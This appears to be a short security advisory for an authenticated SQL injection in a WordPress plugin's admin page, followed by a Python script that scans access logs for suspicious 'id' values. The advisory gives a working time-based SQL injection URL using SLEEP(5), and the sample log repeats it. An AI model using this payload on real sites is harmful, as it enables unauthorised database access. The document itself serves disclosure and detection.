The plugin does not sanitise or escape multiple GET/POST parameters before using them in SQL statements in the admin dashboard, leading to authenticated SQL injection.
https://example.com/wp-admin/admin.php?page=pcx_add_sites&mode=add&id=1%20AND%20(SELECT%207953%20FROM%20(SELECT(SLEEP(5)))AgUn)
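An added example, not part of the advisory or the plugin's code: a check over web access logs that flags requests to the affected admin page whose `id` value is not a plain integer, which is the shape of the request above. It assumes combined-format access logs and that a legitimate `id` is a decimal integer; the sample log lines and client addresses are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Page slug and parameter name come from the advisory's request URL.
AFFECTED_PAGE = "pcx_add_sites"
# Assumption: a legitimate `id` is a plain decimal integer.
PLAIN_INT = re.compile(r"\d{1,20}")
# Assumption: Apache/nginx "combined" access-log layout.
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Constructed sample log lines (documentation-range client addresses).
SAMPLE_LOG = [
    '192.0.2.10 - admin [01/Jan/2024:10:00:00 +0000] '
    '"GET /wp-admin/admin.php?page=pcx_add_sites&mode=add&id=1 HTTP/1.1" 200 5120',
    '198.51.100.7 - editor [01/Jan/2024:10:02:11 +0000] '
    '"GET /wp-admin/admin.php?page=pcx_add_sites&mode=add&id=1%20AND%20'
    '(SELECT%207953%20FROM%20(SELECT(SLEEP(5)))AgUn) HTTP/1.1" 200 5120',
    '192.0.2.10 - admin [01/Jan/2024:10:03:40 +0000] '
    '"GET /wp-admin/admin.php?page=other_page&id=abc HTTP/1.1" 200 900',
]


def id_is_suspicious(target):
    """True if the request hits the affected page with a non-integer `id`."""
    parts = urlsplit(target)
    if not parts.path.endswith("/wp-admin/admin.php"):
        return False
    params = parse_qs(parts.query, keep_blank_values=True)  # percent-decodes values
    if AFFECTED_PAGE not in params.get("page", []):
        return False
    return any(not PLAIN_INT.fullmatch(v) for v in params.get("id", []))


def scan(lines):
    """Return (client, timestamp, request target) for each flagged log line."""
    hits = []
    for line in lines:
        m = LOG_LINE.match(line)
        # Only query-string parameters appear in access logs; POST bodies do not.
        if m and id_is_suspicious(m.group("target")):
            hits.append((m.group("ip"), m.group("ts"), m.group("target")))
    return hits


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

The same integer-only rule is what a server-side fix would enforce before the value reaches a query; parameters sent in POST bodies need a WAF or application-level log to be covered.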